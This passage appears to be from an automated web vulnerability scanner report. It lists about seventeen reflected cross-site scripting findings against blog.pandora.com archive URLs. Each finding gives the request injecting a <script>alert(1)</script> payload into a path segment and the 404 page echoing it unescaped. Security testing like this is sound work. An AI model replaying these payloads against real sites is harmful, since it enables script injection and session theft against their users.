Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p>
...[SNIP]...

3.121. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p>
...[SNIP]...

3.122. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p>
...[SNIP]...

3.123. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p>
...[SNIP]...

3.124. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p>
...[SNIP]...

3.125. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p>
...[SNIP]...

3.126. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p>
...[SNIP]...

3.127. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p>
...[SNIP]...

3.128. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p>
...[SNIP]...

3.129. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p>
...[SNIP]...

3.130. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p>
...[SNIP]...

3.131. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p>
...[SNIP]...

3.132. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p>
...[SNIP]...

3.133. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p>
...[SNIP]...

3.134. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p>
...[SNIP]...

3.135. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p>
...[SNIP]...

3.136. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p>
...[SNIP]...

3.137. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
